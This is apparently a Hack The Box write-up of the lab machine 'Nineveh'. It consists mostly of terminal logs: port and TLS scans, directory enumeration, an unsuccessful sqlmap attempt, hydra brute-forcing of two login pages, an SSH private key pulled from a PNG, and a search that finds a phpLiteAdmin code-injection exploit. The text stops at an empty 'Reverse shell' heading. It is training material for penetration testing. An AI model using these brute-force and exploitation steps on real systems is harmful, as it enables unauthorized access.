Nineveh
Contents
Ports scan
u505@kali:~/HTB/Machines/Nineveh$ sudo masscan -e tun0 -p1-65535,U:1-65535 --rate 1000 10.10.10.43 [sudo] password for u505:
Starting masscan 1.0.5 at 2020-05-10 18:48:08 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 443/tcp on 10.10.10.43 Discovered open port 80/tcp on 10.10.10.43
u505@kali:~/HTB/Machines/Nineveh$ nmap -sC -sV 10.10.10.43 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-07 21:05 EDT Nmap scan report for 10.10.10.43 Host is up (0.054s latency). Not shown: 998 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn't have a title (text/html). 443/tcp open ssl/http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn't have a title (text/html). | ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR | Not valid before: 2017-07-01T15:03:30 |_Not valid after: 2018-07-01T15:03:30 |_ssl-date: TLS randomness does not represent time | tls-alpn: |_ http/1.1
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 22.26 seconds
u505@kali:~/HTB/Machines/Nineveh$ sslscan --show-certificate https://nineveh.htb Version: 2.0.0-static OpenSSL 1.1.1f-dev xx XXX xxxx
Connected to 10.10.10.43
Testing SSL server nineveh.htb on port 443 using SNI name nineveh.htb
SSL/TLS Protocols: SSLv2 disabled SSLv3 disabled TLSv1.0 enabled TLSv1.1 enabled TLSv1.2 enabled TLSv1.3 disabled
TLS Fallback SCSV: Server supports TLS Fallback SCSV
TLS renegotiation: Secure session renegotiation supported
TLS Compression: Compression disabled
Heartbleed: TLSv1.2 not vulnerable to heartbleed TLSv1.1 not vulnerable to heartbleed TLSv1.0 not vulnerable to heartbleed
Supported Server Cipher(s): Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256 Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 2048 bits Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256 Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 2048 bits Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256 Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 2048 bits Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256 Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 2048 bits Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256 Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 2048 bits Accepted TLSv1.2 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256 Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 2048 bits Accepted TLSv1.2 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits Accepted TLSv1.2 256 bits AES256-GCM-SHA384 Accepted TLSv1.2 128 bits AES128-GCM-SHA256 Accepted TLSv1.2 256 bits AES256-SHA256 Accepted TLSv1.2 128 bits AES128-SHA256 Accepted TLSv1.2 256 bits AES256-SHA Accepted TLSv1.2 256 bits CAMELLIA256-SHA Accepted TLSv1.2 128 bits AES128-SHA Accepted TLSv1.2 128 bits CAMELLIA128-SHA Preferred TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256 Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 2048 bits Accepted TLSv1.1 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256 Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 2048 bits Accepted TLSv1.1 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits Accepted TLSv1.1 256 bits AES256-SHA Accepted TLSv1.1 256 bits CAMELLIA256-SHA Accepted TLSv1.1 128 bits AES128-SHA Accepted TLSv1.1 128 bits CAMELLIA128-SHA Preferred TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256 Accepted TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 2048 bits Accepted TLSv1.0 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256 Accepted TLSv1.0 128 bits DHE-RSA-AES128-SHA DHE 2048 bits Accepted TLSv1.0 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits Accepted TLSv1.0 256 bits AES256-SHA Accepted TLSv1.0 256 bits CAMELLIA256-SHA Accepted TLSv1.0 128 bits AES128-SHA Accepted TLSv1.0 128 bits CAMELLIA128-SHA
Server Key Exchange Group(s): TLSv1.2 141 bits sect283k1 TLSv1.2 141 bits sect283r1 TLSv1.2 204 bits sect409k1 TLSv1.2 204 bits sect409r1 TLSv1.2 285 bits sect571k1 TLSv1.2 285 bits sect571r1 TLSv1.2 128 bits secp256k1 TLSv1.2 128 bits secp256r1 (NIST P-256) TLSv1.2 192 bits secp384r1 (NIST P-384) TLSv1.2 260 bits secp521r1 (NIST P-521) TLSv1.2 128 bits brainpoolP256r1 TLSv1.2 192 bits brainpoolP384r1 TLSv1.2 256 bits brainpoolP512r1
Server Signature Algorithm(s): TLSv1.2 rsa_pkcs1_sha1 TLSv1.2 dsa_sha1 TLSv1.2 ecdsa_sha1 TLSv1.2 rsa_pkcs1_sha224 TLSv1.2 dsa_sha224 TLSv1.2 ecdsa_sha224 TLSv1.2 rsa_pkcs1_sha256 TLSv1.2 dsa_sha256 TLSv1.2 ecdsa_secp256r1_sha256 TLSv1.2 rsa_pkcs1_sha384 TLSv1.2 dsa_sha384 TLSv1.2 ecdsa_secp384r1_sha384 TLSv1.2 rsa_pkcs1_sha512 TLSv1.2 dsa_sha512 TLSv1.2 ecdsa_secp521r1_sha512
SSL Certificate: Certificate blob: -----BEGIN CERTIFICATE----- MIID+TCCAuGgAwIBAgIJANwojrkai1UOMA0GCSqGSIb3DQEBCwUAMIGSMQswCQYD VQQGEwJHUjEPMA0GA1UECAwGQXRoZW5zMQ8wDQYDVQQHDAZBdGhlbnMxFzAVBgNV BAoMDkhhY2tUaGVCb3ggTHRkMRAwDgYDVQQLDAdTdXBwb3J0MRQwEgYDVQQDDAtu aW5ldmVoLmh0YjEgMB4GCSqGSIb3DQEJARYRYWRtaW5AbmluZXZlaC5odGIwHhcN MTcwNzAxMTUwMzMwWhcNMTgwNzAxMTUwMzMwWjCBkjELMAkGA1UEBhMCR1IxDzAN BgNVBAgMBkF0aGVuczEPMA0GA1UEBwwGQXRoZW5zMRcwFQYDVQQKDA5IYWNrVGhl Qm94IEx0ZDEQMA4GA1UECwwHU3VwcG9ydDEUMBIGA1UEAwwLbmluZXZlaC5odGIx IDAeBgkqhkiG9w0BCQEWEWFkbWluQG5pbmV2ZWguaHRiMIIBIjANBgkqhkiG9w0B AQEFAAOCAQ8AMIIBCgKCAQEA+HUDrGgG769A68bslDXjV/uBaw18SaF52iEz/ui2 WwXguHnY8BS7ZetS4jAso6BOrGUZpN3+278mROPa4khQlmZ09cj8kQ4k7lOIxSlp eZxvt+R8fkJvtA7e47nvwP4H2O6SI0nD/pGDZc05i842kOc/8Kw+gKkglotGi8ZO GiuRgzyfdaNSWC7Lj3gTjVMCllhc6PgcQf9r7vK1KPkyFleYDUwB0dwf3taN0J2C U2EHz/4U1l40HoIngkwfhFI+2z2J/xx2JP+iFUcsV7LQRw0x4g6Z5WFWETluWUHi AWUZHrjMpMaXs3TZNNW81tWUP2jBulX5kv6H5CTocsXgyQIDAQABo1AwTjAdBgNV HQ4EFgQUh0YSfVOI05WyOFntGykwc3/OzrMwHwYDVR0jBBgwFoAUh0YSfVOI05Wy OFntGykwc3/OzrMwDAYDVR0TBAUwAwEB/zANBgkqhkiG9w0BAQsFAAOCAQEAehma AJKuLeAHqHAIcLopQg9mE28lYDGxf+3eIEuUAHmUKs0qGLs3ZTY8J77XTxmjvH1U qYVXfZSub1IG7LgUFybLFKNl6gioKEPXXA9ofKdoJX6Bar/0G/15YRSEZGc9WXh4 Xh1Qr3rkYYZj/rJa4H5uiWoRFofSTNGMfbY8iF8X2+P2LwyEOqThypdMBKMiIt6d 7sSuqsrnQRa73OdqdoCpHxEG6antne6Vvz3ALxv4cI7SqzKiQvH1zdJ/jOhZK1g1 CxLUGYbNsjIJWSdOoSlIgRswnu+A+O612+iosxYaYdCUZ8BElgjUAXLEHzuUFtRb KrYQgX28Ulf8OSGJuA== -----END CERTIFICATE----- Version: 2 Serial Number: dc:28:8e:b9:1a:8b:55:0e Signature Algorithm: sha256WithRSAEncryption Issuer: /C=GR/ST=Athens/L=Athens/O=HackTheBox Ltd/OU=Support/CN=nineveh.htb/emailAddress=admin@nineveh.htb Not valid before: Jul 1 15:03:30 2017 GMT Not valid after: Jul 1 15:03:30 2018 GMT Subject: /C=GR/ST=Athens/L=Athens/O=HackTheBox Ltd/OU=Support/CN=nineveh.htb/emailAddress=admin@nineveh.htb Public Key Algorithm: NULL RSA Public Key: (2048 bit) RSA Public-Key: (2048 bit) Modulus: 00:f8:75:03:ac:68:06:ef:af:40:eb:c6:ec:94:35: e3:57:fb:81:6b:0d:7c:49:a1:79:da:21:33:fe:e8: b6:5b:05:e0:b8:79:d8:f0:14:bb:65:eb:52:e2:30: 2c:a3:a0:4e:ac:65:19:a4:dd:fe:db:bf:26:44:e3: da:e2:48:50:96:66:74:f5:c8:fc:91:0e:24:ee:53: 88:c5:29:69:79:9c:6f:b7:e4:7c:7e:42:6f:b4:0e: de:e3:b9:ef:c0:fe:07:d8:ee:92:23:49:c3:fe:91: 83:65:cd:39:8b:ce:36:90:e7:3f:f0:ac:3e:80:a9: 20:96:8b:46:8b:c6:4e:1a:2b:91:83:3c:9f:75:a3: 52:58:2e:cb:8f:78:13:8d:53:02:96:58:5c:e8:f8: 1c:41:ff:6b:ee:f2:b5:28:f9:32:16:57:98:0d:4c: 01:d1:dc:1f:de:d6:8d:d0:9d:82:53:61:07:cf:fe: 14:d6:5e:34:1e:82:27:82:4c:1f:84:52:3e:db:3d: 89:ff:1c:76:24:ff:a2:15:47:2c:57:b2:d0:47:0d: 31:e2:0e:99:e5:61:56:11:39:6e:59:41:e2:01:65: 19:1e:b8:cc:a4:c6:97:b3:74:d9:34:d5:bc:d6:d5: 94:3f:68:c1:ba:55:f9:92:fe:87:e4:24:e8:72:c5: e0:c9 Exponent: 65537 (0x10001) X509v3 Extensions: X509v3 Subject Key Identifier: 87:46:12:7D:53:88:D3:95:B2:38:59:ED:1B:29:30:73:7F:CE:CE:B3 X509v3 Authority Key Identifier: keyid:87:46:12:7D:53:88:D3:95:B2:38:59:ED:1B:29:30:73:7F:CE:CE:B3
X509v3 Basic Constraints: CA:TRUE Verify Certificate: self signed certificate
SSL Certificate: Signature Algorithm: sha256WithRSAEncryption RSA Key Strength: 2048
Subject: nineveh.htb Issuer: nineveh.htb
Not valid before: Jul 1 15:03:30 2017 GMT Not valid after: Jul 1 15:03:30 2018 GMT
Web server port 80
u505@kali:~/HTB/Machines/Nineveh$ curl http://nineveh.htb <html><body><h1>It works!</h1> <p>This is the default web page for this server.</p> <p>The web server software is running but no content has been added, yet.</p> </body></html>
dirsearch
u505@kali:~/HTB/Machines/Nineveh$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common2.txt -e "js,html,txt,php" -f -t 50 -u http://nineveh.htb/
_|. _ _ _ _ _ _|_ v0.3.9 (_||| _) (/_(_|| (_| )
Extensions: js, html, txt, php | HTTP method: get | Threads: 50 | Wordlist size: 22974
Error Log: /opt/utils/dirsearch/logs/errors-20-05-07_21-22-22.log
Target: http://nineveh.htb/
[21:22:22] Starting: [21:22:23] 403 - 291B - /.html [21:22:25] 403 - 290B - /.php [21:22:49] 403 - 292B - /icons/ [21:22:49] 200 - 178B - /index.html [21:22:50] 200 - 83KB - /info.php/ [21:22:50] 200 - 83KB - /info.php [21:23:09] 403 - 300B - /server-status/
Task Completed
The first search doesn't provide much information execpt the info.php page. The second dirsearch with extended dictionnary and extensions txt and php give us more information.
u505@kali:~/HTB/Machines/Nineveh$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e "txt,php" -f -t 50 -u http://nineveh.htb/
_|. _ _ _ _ _ _|_ v0.3.9 (_||| _) (/_(_|| (_| )
Extensions: txt, php | HTTP method: get | Threads: 50 | Wordlist size: 661562
Error Log: /opt/utils/dirsearch/logs/errors-20-05-07_21-35-35.log
Target: http://nineveh.htb/
[21:35:35] Starting: [21:35:35] 403 - 290B - /.php [21:35:36] 403 - 292B - /icons/ [21:35:37] 200 - 83KB - /info.php [21:35:54] 200 - 68B - /department/ [21:43:45] 403 - 300B - /server-status/
Task Completed
Sqlmap
At first, We try to find if the page is vulnerable to SQL injection.
u505@kali:~/HTB/Machines/Nineveh$ cat login.req POST /department/login.php HTTP/1.1 Host: nineveh.htb User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://nineveh.htb/department/login.php Content-Type: application/x-www-form-urlencoded Content-Length: 29 Connection: close Cookie: PHPSESSID=f3u4488a8dav1cajju1jcreis3 Upgrade-Insecure-Requests: 1
username=admin&password=admin
u505@kali:~/HTB/Machines/Nineveh$ sqlmap -r login.req
___
__H__
___ ___[.]_____ ___ ___ {1.4.4#stable}
|_ -| . [)] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 21:37:44 /2020-05-07/
[21:37:44] [INFO] parsing HTTP request from 'login.req'
[21:37:44] [INFO] testing connection to the target URL
[21:37:44] [INFO] checking if the target is protected by some kind of WAF/IPS
[21:37:45] [INFO] testing if the target URL content is stable
[21:37:45] [INFO] target URL content is stable
[21:37:45] [INFO] testing if POST parameter 'username' is dynamic
[21:37:45] [WARNING] POST parameter 'username' does not appear to be dynamic
[21:37:45] [WARNING] heuristic (basic) test shows that POST parameter 'username' might not be injectable
[21:37:45] [INFO] testing for SQL injection on POST parameter 'username'
[21:37:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[21:37:46] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[21:37:46] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[21:37:47] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[21:37:47] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[21:37:48] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[21:37:48] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[21:37:48] [INFO] testing 'Generic inline queries'
[21:37:48] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[21:37:49] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[21:37:49] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[21:37:49] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[21:37:50] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[21:37:50] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[21:37:50] [INFO] testing 'Oracle AND time-based blind'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n]
[21:37:55] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[21:37:55] [WARNING] POST parameter 'username' does not seem to be injectable
[21:37:55] [INFO] testing if POST parameter 'password' is dynamic
[21:37:56] [WARNING] POST parameter 'password' does not appear to be dynamic
[21:37:56] [WARNING] heuristic (basic) test shows that POST parameter 'password' might not be injectable
[21:37:56] [INFO] testing for SQL injection on POST parameter 'password'
[21:37:56] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[21:37:56] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[21:37:56] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[21:37:57] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[21:37:57] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[21:37:58] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[21:37:58] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[21:37:58] [INFO] testing 'Generic inline queries'
[21:37:58] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[21:37:58] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[21:37:59] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[21:37:59] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[21:38:00] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[21:38:00] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[21:38:01] [INFO] testing 'Oracle AND time-based blind'
[21:38:01] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[21:38:02] [WARNING] POST parameter 'password' does not seem to be injectable
[21:38:02] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
[*] ending @ 21:38:02 /2020-05-07/
We try with higher level and risk (and longer).
u505@kali:~/HTB/Machines/Nineveh$ sqlmap -r login.req --level 4 --risk 3 ... [21:55:40] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
[*] ending @ 21:55:40 /2020-05-07/
But results were similar, so the application doesn't seem to be vulnerable at SQL injection.
Network brute force
If we try to login with user admin, the system returns Invalid password, but if we try with user u505, the system returns Invalid username. We can deduct that the user admin exists
We try to brute force the login page with user admin
u505@kali:~/HTB/Machines/Nineveh$ hydra -l admin -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt "http-post-form://nineveh.htb/department/login.php:username=admin&password=^PASS^:Invalid Password" Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-05-07 22:31:02 [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task [DATA] attacking http-post-form://nineveh.htb:80/department/login.php:username=admin&password=^PASS^:Invalid Password [STATUS] 1858.00 tries/min, 1858 tries in 00:01h, 14342540 to do in 128:40h, 16 active [80][http-post-form] host: nineveh.htb login: admin password: 1q2w3e4r5t 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-05-07 22:33:32
Web server port 443
u505@kali:~/HTB/Machines/Nineveh$ curl -k https://nineveh.htb <center><img src="ninevehForAll.png" /></center>
u505@kali:~/HTB/Machines/Nineveh$ wget --no-check-certificate https://nineveh.htb/ninevehForAll.png --2020-05-07 21:14:08-- https://nineveh.htb/ninevehForAll.png Resolving nineveh.htb (nineveh.htb)... 10.10.10.43 Connecting to nineveh.htb (nineveh.htb)|10.10.10.43|:443... connected. WARNING: The certificate of ‘nineveh.htb’ is not trusted. WARNING: The certificate of ‘nineveh.htb’ doesn't have a known issuer. WARNING: The certificate of ‘nineveh.htb’ has expired. The certificate has expired HTTP request sent, awaiting response... 200 OK Length: 560852 (548K) [image/png] Saving to: ‘ninevehForAll.png’
ninevehForAll.png 100%[======================================>] 547.71K 1.29MB/s in 0.4s
2020-05-07 21:14:09 (1.29 MB/s) - ‘ninevehForAll.png’ saved [560852/560852]
Dirsearch
u505@kali:~/HTB/Machines/Nineveh$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common2.txt -e "js,html,txt,php" -f -t 50 -u https://nineveh.htb
_|. _ _ _ _ _ _|_ v0.3.9 (_||| _) (/_(_|| (_| )
Extensions: js, html, txt, php | HTTP method: get | Threads: 50 | Wordlist size: 22974
Error Log: /opt/utils/dirsearch/logs/errors-20-05-07_21-12-45.log
Target: https://nineveh.htb
[21:12:45] Starting: [21:12:46] 403 - 291B - /.php [21:12:46] 403 - 292B - /.html [21:13:03] 200 - 11KB - /db/ [21:13:15] 403 - 293B - /icons/ [21:13:16] 200 - 49B - /index.html [21:13:39] 403 - 301B - /server-status/
Task Completed
An extended search, gives us more information.
u505@kali:~/HTB/Machines/Nineveh$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e "txt,php" -f -t 50 -u https://nineveh.htb/
_|. _ _ _ _ _ _|_ v0.3.9 (_||| _) (/_(_|| (_| )
Extensions: txt, php | HTTP method: get | Threads: 50 | Wordlist size: 661562
Error Log: /opt/utils/dirsearch/logs/errors-20-05-07_21-35-22.log
Target: https://nineveh.htb/
[21:35:23] Starting: [21:35:23] 403 - 291B - /.php [21:35:24] 403 - 293B - /icons/ [21:35:31] 200 - 11KB - /db/ [21:45:00] 403 - 301B - /server-status/ [21:45:01] 200 - 71B - /secure_notes/
Task Completed
Secure_notes
An image appears.
The source code doesn't provide more informations.
u505@kali:~/HTB/Machines/Nineveh$ curl -k https://nineveh.htb/secure_notes/ <html> <body> <center><img src=nineveh.png /></center> </body> </html>
Download of the image.
u505@kali:~/HTB/Machines/Nineveh$ wget --no-check-certificate https://nineveh.htb/secure_notes/nineveh.png --2020-05-07 21:28:55-- https://nineveh.htb/secure_notes/nineveh.png Resolving nineveh.htb (nineveh.htb)... 10.10.10.43 Connecting to nineveh.htb (nineveh.htb)|10.10.10.43|:443... connected. WARNING: The certificate of ‘nineveh.htb’ is not trusted. WARNING: The certificate of ‘nineveh.htb’ doesn't have a known issuer. WARNING: The certificate of ‘nineveh.htb’ has expired. The certificate has expired HTTP request sent, awaiting response... 200 OK Length: 2891984 (2.8M) [image/png] Saving to: ‘nineveh.png’
nineveh.png 100%[======================================>] 2.76M 645KB/s in 4.4s
2020-05-07 21:28:59 (639 KB/s) - ‘nineveh.png’ saved [2891984/2891984]
Some information has been appended at the end of the image, in tar format.
u505@kali:~/HTB/Machines/Nineveh$ strings nineveh.png | tail -n 60 r)'es IEND secret/ 0000755 0000041 0000041 00000000000 13126060277 012377 ustar www-data www-data secret/nineveh.priv 0000600 0000041 0000041 00000003213 13126045656 014730 ustar www-data www-data -----BEGIN RSA PRIVATE KEY----- MIIEowIBAAKCAQEAri9EUD7bwqbmEsEpIeTr2KGP/wk8YAR0Z4mmvHNJ3UfsAhpI H9/Bz1abFbrt16vH6/jd8m0urg/Em7d/FJncpPiIH81JbJ0pyTBvIAGNK7PhaQXU PdT9y0xEEH0apbJkuknP4FH5Zrq0nhoDTa2WxXDcSS1ndt/M8r+eTHx1bVznlBG5 FQq1/wmB65c8bds5tETlacr/15Ofv1A2j+vIdggxNgm8A34xZiP/WV7+7mhgvcnI 3oqwvxCI+VGhQZhoV9Pdj4+D4l023Ub9KyGm40tinCXePsMdY4KOLTR/z+oj4sQT X+/1/xcl61LADcYk0Sw42bOb+yBEyc1TTq1NEQIDAQABAoIBAFvDbvvPgbr0bjTn KiI/FbjUtKWpWfNDpYd+TybsnbdD0qPw8JpKKTJv79fs2KxMRVCdlV/IAVWV3QAk FYDm5gTLIfuPDOV5jq/9Ii38Y0DozRGlDoFcmi/mB92f6s/sQYCarjcBOKDUL58z GRZtIwb1RDgRAXbwxGoGZQDqeHqaHciGFOugKQJmupo5hXOkfMg/G+Ic0Ij45uoR JZecF3lx0kx0Ay85DcBkoYRiyn+nNgr/APJBXe9Ibkq4j0lj29V5dT/HSoF17VWo 9odiTBWwwzPVv0i/JEGc6sXUD0mXevoQIA9SkZ2OJXO8JoaQcRz628dOdukG6Utu Bato3bkCgYEA5w2Hfp2Ayol24bDejSDj1Rjk6REn5D8TuELQ0cffPujZ4szXW5Kb ujOUscFgZf2P+70UnaceCCAPNYmsaSVSCM0KCJQt5klY2DLWNUaCU3OEpREIWkyl 1tXMOZ/T5fV8RQAZrj1BMxl+/UiV0IIbgF07sPqSA/uNXwx2cLCkhucCgYEAwP3b vCMuW7qAc9K1Amz3+6dfa9bngtMjpr+wb+IP5UKMuh1mwcHWKjFIF8zI8CY0Iakx DdhOa4x+0MQEtKXtgaADuHh+NGCltTLLckfEAMNGQHfBgWgBRS8EjXJ4e55hFV89 P+6+1FXXA1r/Dt/zIYN3Vtgo28mNNyK7rCr/pUcCgYEAgHMDCp7hRLfbQWkksGzC fGuUhwWkmb1/ZwauNJHbSIwG5ZFfgGcm8ANQ/Ok2gDzQ2PCrD2Iizf2UtvzMvr+i tYXXuCE4yzenjrnkYEXMmjw0V9f6PskxwRemq7pxAPzSk0GVBUrEfnYEJSc/MmXC iEBMuPz0RAaK93ZkOg3Zya0CgYBYbPhdP5FiHhX0+7pMHjmRaKLj+lehLbTMFlB1 MxMtbEymigonBPVn56Ssovv+bMK+GZOMUGu+A2WnqeiuDMjB99s8jpjkztOeLmPh PNilsNNjfnt/G3RZiq1/Uc+6dFrvO/AIdw+goqQduXfcDOiNlnr7o5c0/Shi9tse i6UOyQKBgCgvck5Z1iLrY1qO5iZ3uVr4pqXHyG8ThrsTffkSVrBKHTmsXgtRhHoc il6RYzQV/2ULgUBfAwdZDNtGxbu5oIUB938TCaLsHFDK6mSTbvB/DywYYScAWwF7 fw4LVXdQMjNJC3sn3JaqY1zJkE4jXlZeNQvCx4ZadtdJD9iO+EUG -----END RSA PRIVATE KEY----- secret/nineveh.pub 0000644 0000041 0000041 00000000620 13126060277 014541 ustar www-data www-data ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCuL0RQPtvCpuYSwSkh5OvYoY//CTxgBHRniaa8c0ndR+wCGkgf38HPVpsVuu3Xq8fr+N3ybS6uD8Sbt38Umdyk+IgfzUlsnSnJMG8gAY0rs+FpBdQ91P3LTEQQfRqlsmS6Sc/gUflmurSeGgNNrZbFcNxJLWd238zyv55MfHVtXOeUEbkVCrX/CYHrlzxt2zm0ROVpyv/Xk5+/UDaP68h2CDE2CbwDfjFmI/9ZXv7uaGC9ycjeirC/EIj5UaFBmGhX092Pj4PiXTbdRv0rIabjS2KcJd4+wx1jgo4tNH/P6iPixBNf7/X/FyXrUsANxiTRLDjZs5v7IETJzVNOrU0R amrois@nineveh.htb
We save Amrois' private key, although ssh port is not available externally.
Db folder
u505@kali:~/HTB/Machines/Nineveh$ searchsploit phpliteadmin
----------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
----------------------------------------------------------------- ----------------------------------------
PHPLiteAdmin 1.9.3 - Remote PHP Code Injection | exploits/php/webapps/24044.txt
phpLiteAdmin - 'table' SQL Injection | exploits/php/webapps/38228.txt
phpLiteAdmin 1.1 - Multiple Vulnerabilities | exploits/php/webapps/37515.txt
phpLiteAdmin 1.9.6 - Multiple Vulnerabilities | exploits/php/webapps/39714.txt
----------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
u505@kali:~/HTB/Machines/Nineveh$ searchsploit -m 24044
Exploit: PHPLiteAdmin 1.9.3 - Remote PHP Code Injection
URL: https://www.exploit-db.com/exploits/24044
Path: /usr/share/exploitdb/exploits/php/webapps/24044.txt
File Type: ASCII text, with CRLF line terminators
Copied to: /home/u505/HTB/Machines/Nineveh/24044.txt
The exploit 24044 is very promising, it allows to embed php code in SQLite databases, but we need to log into the application.
u505@kali:~/HTB/Machines/Nineveh$ hydra -l admin -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt "https-post-form://nineveh.htb/db/:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password" Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-05-07 22:11:57 [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task [DATA] attacking http-post-forms://nineveh.htb:443/db/:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password [STATUS] 1006.00 tries/min, 1006 tries in 00:01h, 14343392 to do in 237:38h, 16 active [443][http-post-form] host: nineveh.htb login: admin password: password123 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-05-07 22:13:20
Reverse shell
